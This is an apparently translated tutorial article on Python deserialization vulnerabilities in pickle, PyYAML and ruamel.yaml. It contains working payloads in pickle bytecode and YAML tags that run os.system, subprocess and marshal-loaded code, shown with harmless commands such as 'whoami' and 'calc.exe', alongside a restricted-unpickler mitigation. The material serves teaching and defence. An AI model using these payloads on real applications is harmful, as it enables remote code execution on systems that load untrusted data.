
Example Analysis of Python deserialization

2025-01-16 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01

This article walks through a sample analysis of Python deserialization vulnerabilities. It is intended as a practical reference.

Python deserialization vulnerabilities: Pickle

Serialization: pickle.dumps() serializes an object into a byte string, and pickle.dump() writes the serialized bytes to a file.

Deserialization: pickle.loads() deserializes a byte string into an object, and pickle.load() reads the data from a file and deserializes it.

When using dump() and dumps(), you can use the protocol parameter to specify the protocol version; load() and loads() detect the protocol from the data.

The protocol has versions 0, 1, 2, 3, 4, and 5. Different Python versions default to different protocol versions. Of these, version 0 is the most readable, and later versions add unprintable characters for optimization.

The protocols are backward compatible, so data written with an older protocol, including version 0, can still be loaded directly.
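As a rough illustration of the protocol parameter, the sketch below pickles one list with every protocol the running interpreter supports and loads each result back. The sample value is arbitrary.

```python
import pickle

data = ["a", "b", "c"]

# Serialize the same object with every protocol this interpreter supports.
sizes = {}
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(data, protocol=proto)
    sizes[proto] = len(blob)
    # loads() takes no protocol argument: it is detected from the data.
    assert pickle.loads(blob) == data

# Protocol 0 is printable ASCII; protocol 2 and later start with PROTO (\x80).
print(pickle.dumps(data, protocol=0))
print(pickle.dumps(data, protocol=3))
print(sizes)
```

Comparing the two printed byte strings shows why protocol 0 is the easiest to read and edit by hand.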

Serializable objects

None, True and False

Integers, floating-point numbers, complex numbers

str, bytes, bytearray

Collections that contain only picklable objects, including tuple, list, set, and dict

Functions defined at the top level of a module (using def, not lambda)

Built-in functions defined at the top level of a module

Classes defined at the top level of a module

Instances of classes whose __dict__ value or whose __getstate__() return value can be serialized (see Pickling Class Instances in the official documentation for details)
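The difference between a named top-level function and a lambda can be checked with a short sketch. The names square and lambda_ok are only illustrative.

```python
import pickle

square = lambda x: x * x  # a lambda has no importable name

# Built-in functions are pickled by reference (module name + function name).
blob = pickle.dumps(len)
assert pickle.loads(blob) is len

try:
    pickle.dumps(square)
    lambda_ok = True
except (pickle.PicklingError, AttributeError):
    # pickle cannot find an object named "<lambda>" in the module.
    lambda_ok = False

print("lambda picklable:", lambda_ok)
```

Functions and classes are stored only as a module name plus an attribute name, which is why they must be reachable at the top level of a module.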

Deserialization process

The underlying implementation of pickle.load() and pickle.loads() is the _Unpickler class, which performs the deserialization.

During deserialization, _Unpickler (hereinafter called the machine) maintains two things: the stack and the memo (storage area).

To study it, you can use pickletools, the disassembler module for pickles.

[Figure: pickletools disassembly of a pickled list; image unavailable]

As can be seen from the figure, the serialized string is actually a sequence of PVM (Pickle Virtual Machine) instructions, which the machine parses using a stack.

PVM instruction set

The complete PVM instruction set can be viewed in pickletools.py. The instruction set used by different protocol versions varies slightly.

The opcodes in the figure above can be read as follows:

    0: \x80 PROTO      3               # protocol version
    2: ]    EMPTY_LIST                 # push an empty list onto the stack
    3: (    MARK                       # push a mark onto the stack
    4: X        BINUNICODE 'a'         # unicode string
   10: X        BINUNICODE 'b'
   16: X        BINUNICODE 'c'
   22: e        APPENDS    (MARK at 3) # append everything after the mark at 3 to the list
   23: .    STOP                       # pop the result off the stack and end
highest protocol among opcodes = 2
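A listing like this can be produced with pickletools. The sketch below assumes the pickled object is the list ['a', 'b', 'c'] with protocol 3, which matches the opcodes shown.

```python
import io
import pickle
import pickletools

raw = pickle.dumps(["a", "b", "c"], protocol=3)
compact = pickletools.optimize(raw)  # drops unused BINPUT (memo) opcodes

# dis() writes to stdout by default; capture it so it can be inspected.
listing = io.StringIO()
pickletools.dis(compact, out=listing)
print(listing.getvalue())
```

Running dis() on raw instead of compact shows the extra BINPUT opcodes that store each value in the memo.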

There are several important opcodes in the instruction set:

GLOBAL = b'c' # reads two newline-terminated strings, the module name and then the class name, and pushes the named global onto the stack; in other words, the value of the global xxx.xxx can be retrieved

REDUCE = b'R' # pops a callable and an argument tuple, calls the callable with those arguments, and pushes the result onto the stack; the first value returned by __reduce__() is the callable and the second is its argument tuple

BUILD = b'b' # builds the object through __setstate__ or by updating __dict__. If the object has a __setstate__ method, anyobject.__setstate__(argument) is called; if it has no __setstate__ method, the value is applied through anyobject.__dict__.update(argument) (the update may overwrite attributes)

STOP = b'.' # end
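These opcodes can be tried by hand with harmless targets. The sketch below uses math.pi and builtins.abs as stand-ins chosen for illustration. They do not come from the original payloads.

```python
import math
import pickle

# GLOBAL: 'c' + module name + newline + attribute name + newline, then STOP.
pi_value = pickle.loads(b"cmath\npi\n.")

# GLOBAL + REDUCE: push builtins.abs, build the argument tuple (-5,), call it.
#   (     MARK
#   I-5   push the integer -5
#   t     TUPLE: collect everything above the mark into a tuple
#   R     REDUCE: call abs(*(-5,)) and push the result
abs_value = pickle.loads(b"cbuiltins\nabs\n(I-5\ntR.")

print(pi_value, abs_value)
```

Neither byte string was produced by pickle.dumps(), which shows that the machine runs whatever instruction stream it is given.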

A more complex example:

import pickle
import pickletools

class a_class():
    def __init__(self):
        self.age = 24
        self.status = 'student'
        self.list = ['a', 'b', 'c']

a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new, protocol=3)
print(a_class_pickle)

# optimize the pickled string
a_class_pickle = pickletools.optimize(a_class_pickle)
print(a_class_pickle)

# disassemble the pickled string
pickletools.dis(a_class_pickle)

    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ a_class'
   20: )    EMPTY_TUPLE                  # push an empty tuple onto the stack
   21: \x81 NEWOBJ                       # the stack holds a class (__main__ a_class) and then a tuple (pushed at offset 20); cls.__new__(cls, *args) is called, creating an instance with the arguments in the tuple, which is empty here
   22: }    EMPTY_DICT                   # push an empty dictionary onto the stack
   23: (    MARK
   24: X        BINUNICODE 'age'
   32: K        BININT1    24
   34: X        BINUNICODE 'status'
   45: X        BINUNICODE 'student'
   57: X        BINUNICODE 'list'
   66: ]        EMPTY_LIST
   67: (        MARK
   68: X            BINUNICODE 'a'
   74: X            BINUNICODE 'b'
   80: X            BINUNICODE 'c'
   86: e            APPENDS    (MARK at 67)
   87: u        SETITEMS   (MARK at 23)  # add the values pushed after the mark at 23 to the existing dictionary as key-value pairs
   88: b    BUILD                        # update the instance's __dict__ to finish constructing the object
   89: .    STOP
highest protocol among opcodes = 2

Common function execution

There are three PVM opcodes related to function execution: R, i, and o, so a payload can be constructed in three ways:

R:

b'''cos
system
(S'whoami'
tR.'''

i:

b'''(S'whoami'
ios
system
.'''

o:

b'''(cos
system
S'whoami'
o.'''

Command execution (__reduce__())

The __reduce__() magic method is called when an object is pickled and returns a tuple. The first element is a callable, which is called to create the initial version of the object during deserialization, and the second element is the tuple of arguments for that callable. This can lead to RCE vulnerabilities during deserialization.

The opcode that corresponds to __reduce__() is R. As long as the serialized string contains an R instruction, the callable it names is executed, regardless of whether a __reduce__ method is defined in the target program.

pickle automatically imports modules that have not yet been imported when deserializing, so all code-execution and command-execution functions in the Python standard library can be used. The payload should preferably be generated with the same Python version as the target.
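The automatic import can be observed directly. In the sketch below, colorsys is just an arbitrary standard-library module that the script never imports itself.

```python
import pickle
import sys

already_loaded = "colorsys" in sys.modules  # usually False in a fresh interpreter

# GLOBAL names a module that this script never imports on its own.
func = pickle.loads(b"ccolorsys\nrgb_to_hls\n.")

print(already_loaded, "colorsys" in sys.modules, func.__name__)
```

After loads() returns, the module is present in sys.modules even though no import statement for it appears in the script.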

Example:

import os

class a_class():
    def __reduce__(self):
        return os.system, ('whoami',)

# Return value of the __reduce__() magic method: os.system, ('whoami',)
# 1. It returns a tuple with at least two elements
# 2. The first element is the callable: os.system
# 3. The second element is a tuple: ('whoami',); the 'whoami' inside it is the argument of the callable
# 4. So the call made during deserialization is os.system('whoami')

# Pickled with protocol 3 on Windows (where os.system is nt.system), before and after pickletools.optimize():
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.'

    0: \x80 PROTO      3
    2: c    GLOBAL     'nt system'
   13: X    BINUNICODE 'whoami'
   24: \x85 TUPLE1
   25: R    REDUCE
   26: .    STOP
highest protocol among opcodes = 2

When the string is deserialized, the command os.system('whoami') is executed.
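The same mechanism can be observed safely by returning a harmless callable. In the sketch below, operator.add stands in for os.system, and the class name Demo is hypothetical.

```python
import operator
import pickle

class Demo:
    # Harmless stand-in for the os.system example: (callable, argument tuple).
    def __reduce__(self):
        return operator.add, (2, 3)

blob = pickle.dumps(Demo(), protocol=3)
result = pickle.loads(blob)  # REDUCE calls operator.add(2, 3)

print(blob)
print(result)
```

The loaded value is the return value of the callable, not a Demo instance, and the pickle does not reference the Demo class at all.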

Global variable overwriting

__reduce__() uses the R opcode to achieve RCE, while the GLOBAL = b'c' opcode can be used to read and overwrite global variables.

# secret.py
a = 'aaaaaa'

# unser.py
import secret
import pickle

class Flag():
    def __init__(self, a):
        self.a = a

your_payload = b'?'
other_flag = pickle.loads(your_payload)
secret_flag = Flag(secret.a)
if other_flag.a == secret_flag.a:
    print('flag: {}'.format(secret_flag.a))
else:
    print('Notification')

How do you obtain the flag without knowing the value of secret.a?

First, get the serialized string of Flag():

class Flag():
    def __init__(self, a):
        self.a = a

new_flag = pickle.dumps(Flag("A"), protocol=3)
flag = pickletools.optimize(new_flag)
print(flag)
pickletools.dis(new_flag)

b'\x80\x03c__main__\nFlag\n)\x81}X\x01\x00\x00\x00aX\x01\x00\x00\x00Asb.'

    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ Flag'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: q    BINPUT     1
   23: }    EMPTY_DICT
   24: q    BINPUT     2
   26: X    BINUNICODE 'a'
   32: q    BINPUT     3
   34: X    BINUNICODE 'A'
   40: q    BINPUT     4
   42: s    SETITEM
   43: b    BUILD
   44: .    STOP
highest protocol among opcodes = 2

As you can see, the value is pushed at offset 34, assigning the string 'A' to the attribute a. To use the global variable secret.a instead, change X BINUNICODE 'A' to c GLOBAL 'secret a' (that is, replace X\x01\x00\x00\x00A with csecret\na\n). After this string is deserialized, the value of self.a equals secret.a, and the flag is obtained.
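The substitution can be reproduced in a self-contained sketch. The in-memory modules secret and flag_demo are hypothetical stand-ins for secret.py and the script that defines the class. They are registered in sys.modules only so that GLOBAL can resolve them here.

```python
import pickle
import sys
import types

# Hypothetical stand-in for secret.py.
secret = types.ModuleType("secret")
secret.a = "aaaaaa"
sys.modules["secret"] = secret

class Flag:
    def __init__(self, a):
        self.a = a

# Hypothetical module name so that GLOBAL can find the class in this demo.
demo = types.ModuleType("flag_demo")
demo.Flag = Flag
sys.modules["flag_demo"] = demo

original = (b"\x80\x03cflag_demo\nFlag\n)\x81}"
            b"X\x01\x00\x00\x00aX\x01\x00\x00\x00Asb.")

# Swap the BINUNICODE 'A' operand for GLOBAL 'secret a'.
payload = original.replace(b"X\x01\x00\x00\x00A", b"csecret\na\n")

print(pickle.loads(original).a)  # the literal value
print(pickle.loads(payload).a)   # the value read from secret.a
```

The attacker never needs to know the secret value, because the machine looks it up at load time.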

In addition to rewriting the PVM instructions, you can use the exec function to overwrite variables:

test1 = 'test1'
test2 = 'test2'

class A:
    def __reduce__(self):
        return exec, ("test1='asd'\ntest2='qwe'",)

RCE using the BUILD instruction (without the R instruction)

By combining the BUILD and GLOBAL instructions, attributes of an existing class instance can be overwritten with os.system or other functions.

Assuming that a class does not already have a __setstate__ method, we can use {'__setstate__': os.system} to BUILD the object.

When the BUILD instruction is executed, the __dict__ update path is taken because there is no __setstate__ method, and the object's __setstate__ attribute is set to the os.system we specified.

Next, if we BUILD the object again with 'whoami', __setstate__('whoami') is called. At this point __setstate__ has been set to os.system, so RCE is achieved.
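The two BUILD steps can be traced with a harmless callable. In the sketch below, record() and the in-memory module build_demo are hypothetical stand-ins for os.system and the target program's module.

```python
import pickle
import sys
import types

calls = []

def record(arg):
    # Harmless stand-in for os.system: just remember the argument.
    calls.append(arg)

class payload:
    def __init__(self):
        pass

# Hypothetical module so that GLOBAL can resolve both names in this demo.
demo = types.ModuleType("build_demo")
demo.payload = payload
demo.record = record
sys.modules["build_demo"] = demo

data = (b"\x80\x03cbuild_demo\npayload\n)\x81"         # create the instance
        b"}(V__setstate__\ncbuild_demo\nrecord\nub"    # first BUILD: set __setstate__
        b"Vwhoami\nb.")                                 # second BUILD: call it

obj = pickle.loads(data)
print(calls)
```

The first BUILD only stores the callable in the instance __dict__; the second BUILD finds it under the name __setstate__ and calls it with the pushed string.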

Example:

Suppose the code contains an arbitrary class:

class payload:
    def __init__(self):
        pass

Construct PVM instructions from this class:

    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ payload'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: }    EMPTY_DICT                    # to use BUILD, first push a dictionary
   22: (    MARK                          # push a mark
   23: V        UNICODE    '__setstate__' # push the key
   37: c        GLOBAL     'nt system'    # push the value
   48: u        SETITEMS   (MARK at 22)
   49: b    BUILD                         # first BUILD
   50: V    UNICODE    'whoami'           # push the argument
   58: b    BUILD                         # second BUILD
   59: .    STOP

Rewrite the above PVM instructions in bytes form: b'\x80\x03c__main__\npayload\n)\x81}(V__setstate__\ncnt\nsystem\nubVwhoami\nb.'. The command is executed successfully when this is deserialized with pickle.loads().

Using the marshal module to execute arbitrary functions

pickle cannot serialize code objects, but Python provides the marshal module, which can.

A serialized code object cannot simply be invoked through __reduce__(), because __reduce__ works by calling a callable and passing it arguments. Here the function itself is the callable, and we need to execute it rather than pass it as an argument to another function. This requires using the types module to create an anonymous function dynamically.

import base64
import marshal
import types

def code():
    import os
    print('hello')
    os.system('whoami')

code_pickle = base64.b64encode(marshal.dumps(code.__code__))  # in Python 2 this is code.func_code
types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')()  # use types to create an anonymous function dynamically and execute it
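The round trip can be checked with a harmless function. In this sketch, greet() and the name "rebuilt" are only illustrative.

```python
import marshal
import pickle
import types

def greet():
    return "hello"

# pickle refuses code objects...
try:
    pickle.dumps(greet.__code__)
    code_picklable = True
except (TypeError, pickle.PicklingError):
    code_picklable = False

# ...but marshal handles them (the format is specific to the Python version).
blob = marshal.dumps(greet.__code__)
code_obj = marshal.loads(blob)
rebuilt = types.FunctionType(code_obj, globals(), "rebuilt")

print(code_picklable, rebuilt())
```

Because the marshal format changes between Python versions, a marshalled payload generally has to be built with the same version as the target.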

Use with pickle:

import pickle

# rewrite types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')() in PVM form
s = b"""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'4wAAAAAAAAAAAAAAAAEAAAADAAAAQwAAAHMeAAAAZAFkAGwAfQB0AWQCgwEBAHwAoAJkA6EBAQBkAFMAKQRO6QAAAADaBWhlbGxv2gZ3aG9hbWkpA9oCb3PaBXByaW502gZzeXN0ZW0pAXIEAAAAqQByBwAAAPogRDovUHl0aG9uL1Byb2plY3QvdW5zZXJpYWxpemUucHnaBGNvZGUlAAAAcwYAAAAAAQgBCAE='
tRtRc__builtin__
globals
(tRS''
tR(tR."""
pickle.loads(s)  # the string must be converted to bytes

Vulnerability locations

When parsing authentication tokens and sessions

When objects are pickled and stored in a file on disk

When objects are pickled and transferred over the network

When pickled data is passed to the program as a parameter
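For data arriving through any of these channels, one common mitigation is to restrict which globals the unpickler may resolve, following the pattern in the official pickle documentation. The sketch below is a minimal version of that pattern. The allow-list and the names RestrictedUnpickler and restricted_loads are assumptions to adapt, not a complete defence.

```python
import builtins
import io
import pickle

# Assumed allow-list: only these builtins may be named by GLOBAL.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL-style opcode in the stream.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))

def restricted_loads(data):
    """Like pickle.loads(), but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

print(restricted_loads(pickle.dumps([1, 2, range(3)])))

try:
    restricted_loads(b"cos\nsystem\n(S'echo hi'\ntR.")
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

The os.system payload is rejected when GLOBAL is resolved, before REDUCE can call anything.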

PyYAML

YAML is a data serialization format, similar in role to XML and JSON. Each language that supports YAML has its own implementation for parsing (reading and writing) it. PyYAML is the Python implementation of YAML.

When using the PyYAML library, parsing YAML files with yaml.load() instead of yaml.safe_load() can lead to deserialization vulnerabilities.

Principle

PyYAML has a set of Python-specific tag handlers, three of which are object-related:

!!python/object: => Constructor.construct_python_object

For example:

# Test.py
import yaml
import os

class test:
    def __init__(self):
        os.system('whoami')

payload = yaml.dump(test())
fp = open('sample.yml', 'w')
fp.write(payload)
fp.close()

After the code is executed, a sample.yml file is generated containing !!python/object:__main__.test {}

Change the contents of the file to !!python/object:Test.test {} and then use yaml.load() to parse the YAML file:

import yaml
yaml.load(open('sample.yml', 'r'))

The command is executed successfully. However, execution depends on Test.py being present, because yaml.load() looks up the test class in Test.py as directed by the YAML file. If Test.py is deleted, the load fails.

Payload

PyYAML < 5.1

To execute commands without this dependency, replace the class or function with one from the Python standard library and use the other two Python tags:

# This tag can create Python objects dynamically when PyYAML parses incoming YAML data
!!python/object/apply: => Constructor.construct_python_object_apply

# This tag calls apply
!!python/object/new: => Constructor.construct_python_object_new

With these two tags, you can construct arbitrary payloads:

!!python/object/apply:subprocess.check_output [[calc.exe]]
!!python/object/apply:subprocess.check_output ["calc.exe"]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/new:os.system ["calc.exe"]

PyYAML >= 5.1

Starting with PyYAML 5.1, deserializing built-in class methods and importing and using code that is not already present are restricted. The load() method also expects a Loader argument, and calling it without one emits a security warning.

There are four types of loader:

BaseLoader: loads only the most basic YAML

SafeLoader: safely loads a subset of the YAML language, recommended for untrusted input (safe_load)

FullLoader: loads the full YAML language while avoiding arbitrary code execution; this is the default loader used by yaml.load(input) in PyYAML 5.1, after issuing a warning (full_load)

UnsafeLoader (also called Loader for backward compatibility): the original Loader code, which can easily be exploited with untrusted input (unsafe_load)
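The difference between the safe loader and the others can be checked with a short sketch. It assumes the third-party PyYAML package is installed. The helper try_safe_load and the sample documents are illustrative only.

```python
try:
    import yaml  # third-party package: pip install pyyaml
except ImportError:  # keep the sketch importable without PyYAML
    yaml = None

# A document using a Python-specific tag, as in the payloads above.
DOC = '!!python/object/apply:os.system ["echo unsafe"]'

def try_safe_load(text):
    """Return (value, error_name) for yaml.safe_load(text)."""
    try:
        return yaml.safe_load(text), None
    except yaml.YAMLError as exc:
        return None, type(exc).__name__

if yaml is not None:
    print(try_safe_load("a: [1, 2]"))  # plain data loads normally
    print(try_safe_load(DOC))          # the python/ tag is rejected
```

SafeLoader has no constructor for python/ tags, so the document is rejected before any object is built.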

On these higher versions the earlier payloads no longer work, but the subprocess.getoutput() method can be used to bypass the restriction:

!!python/object/apply:subprocess.getoutput
- whoami

On the latest version at the time of writing, the command was executed successfully.

ruamel.yaml

The usage of ruamel.yaml is basically the same as that of PyYAML, and it supports the newer YAML 1.2 by default.

To deserialize a serialized class method with arguments in ruamel.yaml, the following calls are available:

load(data)

load(data, Loader=Loader)

load(data, Loader=UnsafeLoader)

load(data, Loader=FullLoader)

load_all(data)

load_all(data, Loader=Loader)

load_all(data, Loader=UnsafeLoader)

load_all(data, Loader=FullLoader)

Any of the above calls can be used. Even calling load() directly on the supplied data deserializes it, and our class methods are executed.
